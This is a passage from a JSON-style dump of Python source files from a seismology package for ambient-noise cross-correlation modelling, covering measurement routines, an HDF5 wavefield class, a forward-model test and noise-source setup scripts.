step_test:\n corr_dir = os.path.join(step_dir,'obs_slt')\n else:\n corr_dir = os.path.join(source_config['source_path'],\n 'observed_correlations')\n\n\n files = [f for f in os.listdir(corr_dir) ]\n\n files = [os.path.join(corr_dir,f) for f in files]\n\n synth_dir = os.path.join(step_dir,'corr')\n\n\n columns = ['sta1','sta2','lat1','lon1','lat2','lon2','dist','az','baz',\n 'syn','syn_a','obs','obs_a','l2_norm','snr','snr_a','nstack']\n measurements = pd.DataFrame(columns=columns)\n\n _options_ac = copy.deepcopy(options)\n _options_ac['window_params']['causal_side'] = not(options['window_params']['causal_side'])\n \n # ToDo\n if mtype == 'inst_phase':\n _opt_inst = copy.deepcopy(options)\n\n\n if files == []:\n msg = 'No input found!'\n raise ValueError(msg)\n\n i = 0\n with click.progressbar(files,label='Taking measurements...') as bar:\n\n for f in bar:\n\n\n\n #======================================================\n # Reading\n #======================================================\n\n try:\n tr_o = read(f)[0]\n except:\n print('\\nCould not read data: '+os.path.basename(f))\n i+=1\n continue\n try:\n synth_filename = get_synthetics_filename(os.path.basename(f),\n synth_dir,ignore_network=ignore_network)\n\n except:\n print('\\nCould not obtain synthetics filename: ' + \\\n os.path.basename(f))\n i+=1\n continue\n\n if synth_filename is None:\n continue\n #sfile = glob(os.path.join(synth_dir,synth_filename))[0]\n #print(synth_filename)\n try:\n tr_s = read(synth_filename)[0]\n except:\n print('\\nCould not read synthetics: ' + \\\n synth_filename)\n i+=1\n continue\n\n #======================================================\n # Assigning stats to synthetics, cutting them to right length\n #======================================================\n\n tr_s.stats.sac = tr_o.stats.sac.copy() #ToDo: Give the stats to this thing before!\n tr_s.data = my_centered(tr_s.data,tr_o.stats.npts)\n # Get all the necessary information\n info = get_station_info(tr_o.stats)\n\n #======================================================\n # Filtering\n #======================================================\n print(bandpass)\n if bandpass != None:\n tr_o.taper(taper_perc)\n tr_o.filter('bandpass',freqmin=bandpass[0],\n freqmax=bandpass[1],corners=bandpass[2],\n zerophase=True)\n tr_s.taper(taper_perc)\n tr_s.filter('bandpass',freqmin=bandpass[0],\n freqmax=bandpass[1],corners=bandpass[2],\n zerophase=True)\n\n\n\n #======================================================\n # Weight observed stack by nstack\n #======================================================\n\n tr_o.data /= tr_o.stats.sac.user0\n\n\n\n #======================================================\n # Measurement\n #======================================================\n\n # Take the measurement\n func = rm.get_measure_func(mtype)\n\n # ToDo Change this!!!\n if mtype == 'inst_phase':\n _opt_inst['corr_syn'] = tr_s\n try:\n msr = func(tr_o,**_opt_inst)\n except:\n print(\"** Could not take measurement\")\n print(f)\n continue\n\n else:\n try:\n\n msr_o = func(tr_o,**options)\n msr_s = func(tr_s,**options)\n except:\n print(\"** Could not take measurement\")\n print(f)\n continue\n\n # timeseries-like measurements:\n if mtype in ['square_envelope',\n 'waveform','windowed_waveform']:\n # l2_so = np.trapz(0.5*(msr_s-msr_o)**2) * tr_o.stats.delta\n l2_so = 0.5 * np.sum(np.power((msr_s-msr_o),2))#0.5*np.dot((msr_s-msr_o),(msr_s-msr_o))\n snr = snratio(tr_o,**options)\n snr_a = snratio(tr_o,**_options_ac)\n info.extend([np.nan,np.nan,np.nan,np.nan,\n l2_so,snr,snr_a,tr_o.stats.sac.user0])\n # single value measurements:\n else:\n\n if mtype == 'energy_diff':\n l2_so = 0.5*(msr_s-msr_o)**2\n msr = msr_o[0]\n msr_a = msr_o[1]\n snr = snratio(tr_o,**options)\n snr_a = snratio(tr_o,**_options_ac)\n l2 = l2_so.sum()\n info.extend([msr_s[0],msr_s[1],msr,msr_a,\n l2,snr,snr_a,tr_o.stats.sac.user0])\n elif mtype == 'ln_energy_ratio':\n l2_so = 0.5*(msr_s-msr_o)**2\n msr = msr_o\n snr = snratio(tr_o,**options)\n snr_a = snratio(tr_o,**_options_ac)\n info.extend([msr_s,np.nan,msr,np.nan,\n l2_so,snr,snr_a,tr_o.stats.sac.user0])\n\n elif mtype == 'inst_phase':\n snr = snratio(tr_o,**options)\n snr_a = snratio(tr_o,**_options_ac)\n info.extend([np.nan,np.nan,np.nan,np.nan,\n msr,snr,snr_a,tr_o.stats.sac.user0])\n\n measurements.loc[i] = info\n\n # step index\n i+=1\n\n return measurements\n\ndef run_measurement(source_configfile,measr_configfile,\n step,ignore_network,step_test):\n\n\n # get parameters\n source_config=json.load(open(source_configfile))\n measr_config=json.load(open(measr_configfile))\n mtype = measr_config['mtype']\n bandpass = measr_config['bandpass']\n step_n = 'step_{}'.format(int(step))\n step_dir = os.path.join(source_config['source_path'],\n step_n)\n taper_perc = measr_config['taper_perc']\n\n window_params = {}\n window_params['hw'] = measr_config['window_params_hw']\n \n window_params['sep_noise'] = measr_config['window_params_sep_noise']\n window_params['win_overlap'] = measr_config['window_params_win_overlap']\n window_params['wtype'] = measr_config['window_params_wtype']\n window_params['causal_side'] = measr_config['window_params_causal']\n window_params['plot'] = measr_config['window_plot_measurements']\n \n\n\n if bandpass == None:\n bandpass = [None]\n if type(bandpass[0]) != list and bandpass[0] != None:\n bandpass = [bandpass]\n warn('\\'Bandpass\\' should be defined as list of filters.')\n\n if type(window_params['hw']) != list:\n window_params['hw'] = [window_params['hw']]\n if len(window_params['hw']) != len(bandpass):\n warn('Using the same window length for all measurements.')\n window_params['hw'] = len(bandpass)*[window_params['hw'][0]]\n if type(measr_config['g_speed']) in [float,int]:\n warn('Using the same group velocity for all measurements.')\n g_speeds = len(bandpass)*[measr_config['g_speed']]\n # ToDo: This is ugly and should be sorted out beforehand but \n # I am too lazy.\n elif type(measr_config['g_speed']) == list \\\n and len(measr_config['g_speed']) == len(bandpass):\n g_speeds = measr_config['g_speed']\n \n\n #if bandpass is None or type(bandpass[0]) != list:\n # ms = measurement(source_config,mtype,step,ignore_network,bandpass=bandpass,\n # step_test=step_test,g_speed=g_speed,window_params=window_params)\n #\n # filename = '{}.0.measurement.csv'.format(mtype)\n # ms.to_csv(os.path.join(step_dir,filename),index=None)\n\n #else:\n\n hws = window_params['hw'][:]\n\n for i in range(len(bandpass)):\n\n g_speed = g_speeds[i]\n\n window_params['hw'] = hws[i]\n ms = measurement(source_config,mtype,step,ignore_network,bandpass=bandpass[i],\n step_test=step_test,taper_perc=taper_perc,g_speed=g_speed,window_params=window_params)\n\n filename = '{}.{}.measurement.csv'.format(mtype,i)\n ms.to_csv(os.path.join(step_dir,filename),index=None)\n"
},
{
"alpha_fraction": 0.5518391728401184,
"alphanum_fraction": 0.5575454235076904,
"avg_line_length": 36.36513137817383,
"blob_id": "e7e6a9552df03bc552b52f7125fb13ab864ed79c",
"content_id": "e1205d9fb5ae4ef4fc65c2e19f844a15170d367e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11391,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 304,
"path": "/noisi/my_classes/wavefield.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\nimport numpy as np\nimport os\nimport h5py\n#from obspy import Trace\ntry:\n from noisi.util import plot\nexcept ImportError:\n print('Plotting unavailable, is basemap installed?')\nfrom noisi.util import filter\ntry:\n from scipy.signal import sosfilt\nexcept ImportError:\n from obspy.signal._sosfilt import _sosfilt as sosfilt\ntry:\n from scipy.fftpack import next_fast_len\nexcept ImportError:\n from noisi.borrowed_functions.scipy_next_fast_len import next_fast_len\n#from scipy.signal.signaltools import _next_regular\nfrom obspy.signal.invsim import cosine_taper\nfrom obspy.signal.filter import integer_decimation\nimport click\nfrom warnings import warn\n\n#ToDo: Think about having a frequency domain field as well, maybe with keyword 'fd' \n#ToDo: Think about getting an entire wavefield into memory\n#ToDo: Think about how to write stats and sourcegrid to disk at systematic points in the code.\nclass WaveField(object):\n \"\"\"\n Object to handle database of stored wavefields.\n Basically, just a few methods to work on wavefields stored in an hdf5 file. \n The stored seismograms have to have sampling rate as attribute Fs and number of time steps as attribute ntime; They have to have an ID of format net.sta.loc.cha \n \n #ToDo: Docs\n \"\"\"\n #ToDo stats entry real or complex data\n def __init__(self,file,sourcegrid=None,complex=False,w='r'):\n #shape=None,outfile=None,complex=False):\n \n #if file is not None: \n self.w = w\n self.complex = complex\n \n try: \n self.file = h5py.File(file, self.w)\n except IOError:\n msg = 'Unable to open input file ' + file\n raise IOError(msg)\n #else:\n # try: \n # self.file = h5py.File(file, 'r+')\n # except IOError:\n # msg = 'Unable to open input file ' + file\n # raise IOError(msg)\n # \n \n self.stats = dict(self.file['stats'].attrs)\n #ToDo include in stats\n #self.complex = self.stats['complex']\n self.sourcegrid = self.file['sourcegrid']\n \n if self.complex:\n self.data_r = self.file['real']\n self.data_i = self.file['imag']\n else:\n self.data = self.file['data']\n \n print(self.file)\n \n #ToDo handle complex\n # Thought about using a class method here, but need a copy of the stats!\n def copy_setup(self,newfile,nt=None,ntraces=None,complex=None,w='r+'):\n \n if complex is None:\n complex = self.complex\n # Copy the stats and sourcegrid to a new file with empty (all-zero) arrays for seismograms\n \n # Shape of the new array:\n shape = list(np.shape(self.data))\n if ntraces is not None:\n shape[0] = ntraces\n if nt is not None:\n shape[1] = nt\n shape = tuple(shape)\n \n # Create new file\n file = h5py.File(newfile, 'w-')\n \n # Copy metadata\n stats = file.create_dataset('stats',data=(0,))\n for (key,value) in self.stats.items():\n file['stats'].attrs[key] = value\n \n # Ensure that nt is kept as requested\n if nt is not None and nt != self.stats['nt']:\n file['stats'].attrs['nt'] = nt\n\n #stats.attrs['reference_station'] = self.stats['refstation']\n #stats.attrs['data_quantity'] = self.stats['data_quantity']\n #stats.attrs['ntraces'] = shape[0]\n #stats.attrs['Fs'] = self.stats['Fs']\n #stats.attrs['nt'] = shape[1]\n \n file.create_dataset('sourcegrid',data=self.sourcegrid[:].copy()) \n \n # Initialize data arrays\n if complex:\n file.create_dataset('real',shape,dtype=np.float32)\n file.create_dataset('imag',shape,dtype=np.float32) \n else:\n file.create_dataset('data',shape,dtype=np.float32)\n \n print('Copied setup of '+self.file.filename)\n file.close()\n \n return(WaveField(newfile,w=w,complex=complex))\n \n #def copy_setup_real_to_complex(self,newfile,w='r+'):\n # #Copy the stats and sourcegrid to a new file with empty (all-zero) arrays for seismograms\n # #extend seismograms to spectra to fit the expected length of zero-padded FFT, and add real as well as imag. part\n # file = h5py.File(newfile, 'w')\n # file.create_dataset('stats',data=(0,))\n # for (key,value) in self.stats.items():\n # file['stats'].attrs[key] = value\n # nfft = _next_regular(2*self.stats['nt']-1)\n # shape = (self.stats['ntraces'],nfft//2+1)\n # file.create_dataset('sourcegrid',data=self.sourcegrid[:].copy()) \n # file.create_dataset('real',shape,dtype=np.float32)\n # file.create_dataset('imag',shape,dtype=np.float32)\n # \n # file.close()\n # return WaveField(newfile,complex=True,w=w)\n #\n \n def truncate(self,newfile,truncate_after_seconds):\n \n nt_new = int(round(truncate_after_seconds * self.stats['Fs']))\n \n with self.copy_setup(newfile,nt=nt_new) as wf:\n \n for i in range(self.stats['ntraces']):\n if self.complex:\n wf.data_i[i,:] = self.data_i[i,0:nt_new].copy()\n wf.data_r[i,:] = self.data_r[i,0:nt_new].copy()\n else:\n wf.data[i,:] = self.data[i,0:nt_new].copy()\n \n #wf.file.close()\n \n def filter_all(self,type,overwrite=False,zerophase=True,outfile=None,**kwargs):\n \n if type == 'bandpass':\n sos = filter.bandpass(df=self.stats['Fs'],**kwargs)\n elif type == 'lowpass':\n sos = filter.lowpass(df=self.stats['Fs'],**kwargs)\n elif type == 'highpass':\n sos = filter.highpass(df=self.stats['Fs'],**kwargs)\n else:\n msg = 'Filter %s is not implemented, implemented filters: bandpass, highpass,lowpass' %type\n raise ValueError(msg)\n \n if not overwrite:\n # Create a new hdf5 file of the same shape\n newfile = self.copy_setup(newfile=outfile)\n else:\n # Call self.file newfile\n newfile = self#.file\n \n with click.progressbar(range(self.stats['ntraces']),label='Filtering..' ) as ind:\n for i in ind:\n # Filter each trace\n if zerophase:\n firstpass = sosfilt(sos, self.data[i,:]) # Read in any case from self.data\n newfile.data[i,:] = sosfilt(sos,firstpass[::-1])[::-1] # then assign to newfile, which might be self.file\n else:\n newfile.data[i,:] = sosfilt(sos,self.data[i,:])\n # flush?\n \n if not overwrite:\n print('Processed traces written to file %s, file closed, \\\n reopen to read / modify.' %newfile.file.filename)\n \n newfile.file.close()\n \n\n def decimate(self,decimation_factor,outfile,taper_width=0.005):\n \"\"\"\n Decimate the wavefield and save to a new file \n \"\"\"\n \n fs_old = self.stats['Fs']\n freq = self.stats['Fs'] * 0.4 / float(decimation_factor)\n\n # Get filter coeff\n sos = filter.cheby2_lowpass(fs_old,freq)\n\n # figure out new length\n temp_trace = integer_decimation(self.data[0,:], decimation_factor)\n n = len(temp_trace)\n \n\n # Get taper\n # The default taper is very narrow, because it is expected that the traces are very long.\n taper = cosine_taper(self.stats['nt'],p=taper_width)\n\n \n # Need a new file, because the length changes.\n with self.copy_setup(newfile=outfile,nt=n) as newfile:\n\n for i in range(self.stats['ntraces']):\n \n temp_trace = sosfilt(sos,taper*self.data[i,:])\n newfile.data[i,:] = integer_decimation(temp_trace, decimation_factor)\n \n \n newfile.stats['Fs'] = fs_old / float(decimation_factor)\n\n\n\n # def space_integral(self,weights=None):\n # # ToDo: have this checked; including spatial sampling!\n # # ToDo: Figure out how to assign the metadata...buh\n # trace = Trace()\n # trace.stats.sampling_rate = self.stats['Fs']\n \n # # ToDo: Thinking about weights\n # if not self.complex:\n # if weights: \n # trace.data = np.trapz(np.multiply(self.data[:],weights[:]),axis=0)\n # else:\n # trace.data = np.trapz(self.data[:],axis=0)\n # #oDo complex wavefield\n # else:\n # if weights: \n # trace.data_i = np.trapz(np.multiply(self.data_i[:],weights[:]),axis=0)\n # trace.data_r = np.trapz(np.multiply(self.data_r[:],weights[:]),axis=0)\n # else:\n # trace.data_i = np.trapz(self.data_i[:],axis=0)\n # trace.data_r = np.trapz(self.data_r[:],axis=0)\n \n # return trace\n \n \n def get_snapshot(self,t,resolution=1):\n \n #ToDo: Ask someone who knows h5py well how to do this in a nice way!\n t_sample = int(round(self.stats['Fs'] * t))\n if t_sample >= np.shape(self.data)[1]:\n warn('Requested sample is out of bounds, resetting to last sample.')\n t_sample = np.shape(self.data)[1]-1\n if resolution == 1:\n snapshot = self.data[:,t_sample]\n else:\n snapshot = self.data[0::resolution,t_sample] #0:len(self.data[:,0]):resolution\n print('Got snapshot')\n \n return snapshot\n \n #ToDo put somewhere else \n def plot_snapshot(self,t,resolution=1,**kwargs):\n \n if self.sourcegrid is None:\n msg = 'Must have a source grid to plot a snapshot.'\n raise ValueError(msg)\n \n # ToDo: Replace all the hardcoded geographical boundary values!\n map_x = self.sourcegrid[0][0::resolution]\n map_y = self.sourcegrid[1][0::resolution]\n \n plot.plot_grid(map_x,map_y,self.get_snapshot(t,resolution=resolution),**kwargs)\n \n def update_stats(self):\n \n if self.w != 'r':\n print('Updating stats...')\n self.file['stats'].attrs['ntraces'] = len(self.data[:,0]) if not self.complex else\\\n len(self.data_r[:,0])\n self.file['stats'].attrs['nt'] = len(self.data[0,:]) if not self.complex else\\\n len(self.data_r[0,:])\n self.file['stats'].attrs['complex'] = self.complex\n \n if 'stats' not in self.file.keys():\n self.file.create_dataset('stats',data=(0,))\n for (key,value) in self.stats.items():\n self.file['stats'].attrs[key] = value\n \n #print(self.file['stats'])\n #self.file.flush()\n \n #def write_sourcegrid(self):\n # self.file.create_dataset('sourcegrid',data=self.sourcegrid)\n # self.file.flush()\n \n\n def __enter__(self):\n return self\n \n def __exit__(self,type,value,traceback):\n \n self.update_stats()\n \n #ToDo update the stats\n \n self.file.close()\n \n \n \n \n"
},
{
"alpha_fraction": 0.7066895365715027,
"alphanum_fraction": 0.7298456430435181,
"avg_line_length": 37.86666488647461,
"blob_id": "cf6c3f809216a3352ea0bcc3ffd3d62c997509da",
"content_id": "5f14635862e5630dbc4c320c6ad8e5f8272388d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1166,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 30,
"path": "/noisi/test/test_forward.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nfrom obspy import read\n\ndef test_forward():\n\n\tsrcdir = os.path.join('test','testdata','testsrc')\n\tos.mkdir('test/testdata/testsrc/step_0/corr/')\n\t# copy the preprocessed wavefields\n\tos.system('mkdir '+os.path.join(srcdir,'wavefield_processed'))\n\tos.system('cp test/testdata/testsrc/step_0/starting_model_archived.h5\\\n\t\ttest/testdata/testsrc/step_0/starting_model.h5')\n\tos.system('cp test/testdata/testsrc/wavefield_processed_archived/*.h5 \\\n\t\ttest/testdata/testsrc/wavefield_processed')\n \n\t\n\t# run forward model\n\tos.system('noisi correlation %s 0' %srcdir)\n\n\t# assert the results are the same\n\t# ToDo: path\n\ttr1 = read('test/testdata/testsrc/step_0/corr/NET.STA1..CHA--NET.STA2..CHA.sac')[0]\n\ttr2 = read('test/testdata/testsrc/step_0/corr_archived/NET.STA1..CHA--NET.STA2..CHA.sac')[0]\n\t\n\tassert ((tr1.data - tr2.data)/tr1.data).max() < 1.e-6 \n\tassert tr1.stats.sampling_rate == tr2.stats.sampling_rate\n\n\t# remove the resulting data and the preprocessed wavefields\n\tos.system('rm -rf test/testdata/testsrc/wavefield_processed/')\n\tos.system('rm -rf test/testdata/testsrc/step_0/corr/')\n\tos.system('rm test/testdata/testsrc/step_0/starting_model.h5')\n"
},
{
"alpha_fraction": 0.5206220149993896,
"alphanum_fraction": 0.5720081329345703,
"avg_line_length": 27.288461685180664,
"blob_id": "3b6502bc79d3f08ac711ab807083e110710f3838",
"content_id": "92710f763b97fac3397132264209663b732493d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1479,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 52,
"path": "/noisi/util/Create_Synthetic_Data.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "\n# coding: utf-8\n\nfrom obspy import read\nfrom obspy.geodetics import gps2dist_azimuth\nimport numpy as np\nfrom glob import glob\nimport os\n\n#######################\n# USER INPUT\n#######################\nsynthetics_dir = '.'\ndata_dir = 'data/'\n# coordinates:\ncoords = {'EQ.000..MXZ':(0.00,0.00),'EQ.003..MXZ':(0.00,45.),'EQ.004..MXZ':(0.00,67.5)}\n\n#######################\n\n\ntraces = glob(os.path.join(synthetics_dir,'*.sac'))\namps = np.random.rand(len(traces)*2)\n\n\ncnt = 0\nfor t in traces:\n sta1 = os.path.splitext(os.path.basename(t))[0].split('--')[0]\n sta2 = os.path.splitext(os.path.basename(t))[0].split('--')[1]\n \n datafile = os.path.join(data_dir,os.path.basename(t))\n tr = read(t)[0]\n \n i = tr.stats.npts // 2 + 1 \n tr.data[0:i] *= amps[cnt]\n cnt += 1\n tr.data[i+1:] *= amps[cnt]\n cnt += 1\n \n tr.stats.network = sta1.split('.')[0]\n tr.stats.station = sta1.split('.')[1]\n tr.stats.location = ''\n tr.stats.channel = sta1.split('.')[3]\n tr.stats.sac={}\n tr.stats.sac.kuser0 = sta2.split('.')[0]\n tr.stats.sac.kevnm = sta2.split('.')[1]\n tr.stats.sac.kuser1 = ''\n tr.stats.sac.kuser2 = sta2.split('.')[3]\n tr.stats.sac.stla = coords[sta1][0]\n tr.stats.sac.stlo = coords[sta1][1]\n tr.stats.sac.evla = coords[sta2][0]\n tr.stats.sac.evlo = coords[sta2][1]\n tr.stats.sac.dist = gps2dist_azimuth(coords[sta1][0],coords[sta1][1],coords[sta2][0],coords[sta2][1])[0]\n tr.write(datafile,format='SAC')\n \n\n\n\n"
},
{
"alpha_fraction": 0.6372048854827881,
"alphanum_fraction": 0.647025465965271,
"avg_line_length": 30.89759063720703,
"blob_id": "5bf9829bd51f216c47f7cdaaec59c57f6895246c",
"content_id": "f39c69932cef32eb3b1720b01c079ab090abc3fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 5295,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 166,
"path": "/noisi/test/testdata/testsrc/setting_up_testmodel/setup_noisesource_basis.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "##################################################################\n# USER INPUT\n##################################################################\n# path to project and source model\nprojectpath = '../'\nsourcepath = '.'\n# Resolution of the coastlines (only relevant for ocean distributions)\n# (see basemap documentation)\n# Use coarser for global and finer for regional models\ncoastres = 'i' \n# sampling rate of synthetic Green's function in Hz\nsampling_rate = 1.0\n# length of synthetic seismograms\nn_samples = 3600\n\n################\n# geography\n################\n# list distributions: 'homogeneous', 'ocean','gaussian_blob', 'from_file'\ndistribution_types = [\n'homogeneous'\n]\n# parameters for homogeneous, ocean: none\n# parameters for gaussian blob: center (lat,lon), sigma_radius_m, only_ocean\n# parameters for from_file: filename\ndistribution_params = [\nNone\n]\n\n################\n# spectra\n################\n# list spectra for the above distributions. 'gaussian','from_file'\nspectrum_types = ['gaussian']\n# parameters for gaussian: mean, standard deviation in Hz\nspectrum_params = [ {'mean':0.15,'std':0.02,'weight':5.}]\n###############################################################################\n\n\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport h5py\nfrom noisi.my_classes.basisfunction import BasisFunction\nfrom noisi.util.source_masks import get_source_mask\nfrom noisi.util.plot import plot_grid\ntry:\n from scipy.fftpack import next_fast_len\nexcept ImportError:\n from noisi.borrowed_functions.scipy_next_fast_len import next_fast_len\nfrom obspy.signal.invsim import cosine_taper\nimport json\n\nn = next_fast_len(2*n_samples-1) \nfreq = np.fft.rfftfreq(n,d=1./sampling_rate)\nprint(freq.shape)\ntaper = cosine_taper(len(freq),0.005)\n\ngrd = np.load(os.path.join(projectpath,'sourcegrid.npy'))\nsource_config = json.load(open(os.path.join(sourcepath,'source_config.json')))\nbfunc_type = source_config['spectra_decomposition']\nbfunc_K = source_config['spectra_nr_parameters']\n\n\nb = BasisFunction(bfunc_type,bfunc_K,N=len(freq))\n\n\n\n\n\nspectrum_coefficients = np.zeros((len(spectrum_types),bfunc_K))\ngeographic_weights = np.zeros((len(spectrum_types),grd.shape[-1]))\n\n\ndef gauss_spectrum(sparams):\n spec = taper*np.exp(-(freq-sparams['mean'])**2/\n (2*sparams['std']**2))\n return spec / np.max(np.abs(spec)) * sparams['weight']\n\n\nfor ix_spec in range(len(spectrum_types)):\n \n # get the spectrum\n if spectrum_types[ix_spec] == 'gaussian':\n spectrum = gauss_spectrum(spectrum_params[ix_spec])\n elif spectrum_types[ix_spec] == 'from_file':\n spectrum = np.load(spectrum_params[ix_spec])\n \n # decompose the spectra in the chosen basis\n coeff = b.coeff(spectrum)\n spectrum_coefficients[ix_spec,:] = coeff\n\n\n# get the geographic weights\nfor ix_geo in range(len(distribution_types)):\n\n if distribution_types[ix_geo] =='gaussian_blob':\n\n geographic_weights[ix_geo,:] = get_source_mask('gaussian',grd,\n coastres,distribution_params[ix_geo])\n print(geographic_weights[ix_geo])\n\n elif distribution_types[ix_geo] in ['ocean','homogeneous']:\n\n geographic_weights[ix_geo,:] = get_source_mask(\n distribution_types[ix_geo],grd,coastres)\n \n \n else:\n print(distributions)\n raise NotImplementedError('Unknown geographical distributions. \\\n Must be \\'gaussian\\', \\'homogeneous\\' or \\'ocean\\'.')\n\n\n# get the weighted sum for each location and save\n\nwith h5py.File(os.path.join(sourcepath,'step_0','starting_model.h5'),'w') as fh:\n fh.create_dataset('coordinates',data=grd.astype(np.float64))\n fh.create_dataset('frequencies',data=freq.astype(np.float64))\n fh.create_dataset('model',data=np.zeros((grd.shape[-1],bfunc_K)),\n dtype=np.float32)\n\n\n for ix_loc in range(grd.shape[-1]):\n\n for ix_spec in range(len(spectrum_types)):\n #print(geographic_weights[ix_spec,ix_loc])\n fh['model'][ix_loc,:] += geographic_weights[ix_spec,ix_loc] *\\\n spectrum_coefficients[ix_spec,:]\n\n \n\n fh.flush()\n fh['model'].attrs['spectral_basis'] = bfunc_type\n fh.create_dataset('surf_areas',data=np.ones(grd.shape[-1]))\n\nwith h5py.File(os.path.join(sourcepath,'step_0','base_model.h5'),'w') as fh:\n fh.create_dataset('coordinates',data=grd.astype(np.float64))\n fh.create_dataset('frequencies',data=freq.astype(np.float64))\n fh.create_dataset('model',data=np.empty((grd.shape[-1],bfunc_K)),\n dtype=np.float32)\n\n\n for ix_loc in range(grd.shape[-1]):\n\n for ix_spec in range(len(spectrum_types)):\n \n fh['model'][ix_loc,:] += spectrum_coefficients[ix_spec,:]\n\n fh.flush()\n fh['model'].attrs['spectral_basis'] = bfunc_type\n fh.create_dataset('surf_areas',data=np.ones(grd.shape[-1]))\n# plot\nfor ix_spec in range(len(spectrum_types)):\n spec = np.zeros(freq.shape)\n for i in range(bfunc_K):\n spec += b.basis_vector(i,len(freq)) \\\n * spectrum_coefficients[ix_spec,i]\n plt.plot(freq,spec,linewidth=2)\n\nplt.xlabel('Frequency (Hz)')\nplt.ylabel('Source power (scaled)')\nplt.savefig(os.path.join(sourcepath,'freq_distr_startingmodel.png'))\n#\n#plt.plot_grid(grd[0],grd[1],colored_by_frequency,\n# normalize=False,sequential=True,cmap='viridis')\n"
},
{
"alpha_fraction": 0.6058351397514343,
"alphanum_fraction": 0.6344233155250549,
"avg_line_length": 28.485549926757812,
"blob_id": "2601e760d3f8d1eed532e3df8f0d272bdc9a54b1",
"content_id": "0b35e1583f5f59cc5ee66aea3a05ec0140bcaf59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 5107,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 173,
"path": "/noisi/test/testdata/testsrc/setting_up_testmodel/setup_noisesource.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "\n# coding: utf-8\n\n\nimport numpy as np\nfrom obspy.geodetics import gps2dist_azimuth\nfrom obspy.signal.invsim import cosine_taper\nimport matplotlib.pyplot as plt\nimport h5py\nfrom noisi import WaveField\nimport json\nfrom glob import glob\nimport os\nfrom scipy.fftpack import next_fast_len\nfrom scipy.signal import hann\n\n\n##################################################################\n# USER INPUT\n##################################################################\n# path to project\nprojectpath = '../'\nsourcepath = '.'\n\n\n# geography - Add anything else than a homogeneous distribution by setting to \"True\" the following:\nonly_ocean = False\ngaussian_blobs = False\nno_background = False\nparams_gaussian_blobs = [{'center':(0.,0.),'sigma_radius_m':500000.,'rel_weight':0.00000001}]\n\n#spectra\nparams_gaussian_spectra = [{'central_freq':0.001,'sigma_freq':0.0002,'weight':10.}]\n\n###############################################################################\n\ngrd = np.load(os.path.join(projectpath,'sourcegrid.npy'))\nntraces = np.shape(grd)[-1]\n\nconfig = json.load(open(os.path.join(projectpath,'config.json')))\nsource_config = json.load(open(os.path.join(sourcepath,'source_config.json')))\n\nif source_config['preprocess_do']:\n ext = '*.h5'\n wavefield_path = os.path.join(sourcepath,'wavefield_processed')\nelse:\n ext = '*.h5'\n wavefield_path = config['wavefield_path']\n\n\nwfs = glob(os.path.join(wavefield_path,ext))\nif wfs != []:\n with WaveField(wfs[0]) as wf:\n df = wf.stats['Fs']\n nt = wf.stats['nt']\n \nelse:\n df = float(raw_input('Sampling rate in Hz?\\n'))\n nt = int(raw_input('Nr of time steps?\\n'))\n\n# The number of points for the fft is larger due to zeropadding --> apparent higher frequency sampling\\n\",\nn = next_fast_len(2*nt-1) \nfreq = np.fft.rfftfreq(n,d=1./df)\n \ntaper = cosine_taper(len(freq),0.01)\n\n\ndef get_distance(grid,location):\n def f(lat,lon,location):\n return abs(gps2dist_azimuth(lat,lon,location[0],location[1])[0])\n dist = np.array([f(lat,lon,location) for lat,lon in zip(grid[1],grid[0])])\n return dist\n # Use Basemap to figure out where ocean is\ndef get_ocean_mask():\n from mpl_toolkits.basemap import Basemap\n m = Basemap(rsphere=6378137,resolution='c',projection='cea',lat_0=0.,\n lon_0=0.,llcrnrlat=-90.,urcrnrlat=90.,llcrnrlon=-180.,urcrnrlon=180.)\n (x,y) = m(grd[0],grd[1])\n #ocean_mask = map(lambda (x,y): not m.is_land(x,y),zip(x,y))\n return ocean_mask\n\n\n#########################\n# Create the source distr\n#########################\n\n# geography\nnum_bases = 1\nif gaussian_blobs:\n num_bases += len(params_gaussian_blobs)\n\nbasis1 = np.zeros((num_bases,ntraces))\n\n# homogeneous layer\nbasis1[0,:] = np.ones(ntraces) \n\nif only_ocean:\n ocean_mask = np.array(get_ocean_mask()).astype(int)\n basis1[0,:] *= ocean_mask\n\n # superimposed Gaussian blob(s)\nif gaussian_blobs:\n i = 1\n for blob in params_gaussian_blobs:\n dist = get_distance(grd,blob['center'])\n basis1[i,:] = np.exp(-(dist)**2/(2*blob['sigma_radius_m']**2))\n \n if only_ocean:\n basis1[i,:] *= ocean_mask\n i+=1\n\n\n# spectra\nbasis2 = np.zeros((len(params_gaussian_spectra),len(freq)))\n# 'sort of hum gaussian'\ni = 0\nfor spec in params_gaussian_spectra:\n basis2[i,:] = taper*np.exp(-(freq-spec['central_freq'])**2/(2*spec['sigma_freq']**2))\n# This normalization means different integrals...\n basis2[i,:] /= np.max(np.abs(basis2[0,:]))\n i+=1\n\n\n######################\n# set the weights\n#####################\n# geography\nweights1 = np.ones(np.shape(basis1)[0])\n\nif gaussian_blobs:\n i = 1\n for blob in params_gaussian_blobs:\n weights1[i] = blob['rel_weight']\n i+=1\n if no_background:\n weights1[0] = 0.\n#\n\n\nfrom noisi.util import plot\n\n\n\ndistr = np.dot(weights1,basis1)\nplot.plot_grid(grd[0],grd[1],distr,outfile = os.path.join(sourcepath,'geog_distr_startingmodel.png'))\n\n\nplt.figure()\nplt.semilogx(freq,basis2[0,:])\nplt.xlabel('Frequency (Hz)')\nplt.ylabel('Source power 